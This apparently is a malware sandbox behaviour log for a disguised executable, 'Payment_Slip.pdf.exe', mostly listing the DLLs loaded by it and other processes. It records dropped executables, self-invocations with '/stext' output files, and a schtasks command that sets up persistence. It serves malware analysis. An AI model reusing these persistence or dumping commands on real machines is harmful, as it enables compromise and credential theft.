Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\AppData\Roaming\host.exe "C:\Users\user\AppData\Roaming\host.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\AppData\Local\Temp\conserver.exe "C:\Users\user\AppData\Local\Temp\conserver.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\qticobshgwcqiiv"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\snnvpudbueuusojfxn"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\dpanqmncqmmhvvfjoxmrs"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Process created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: amsi.dll
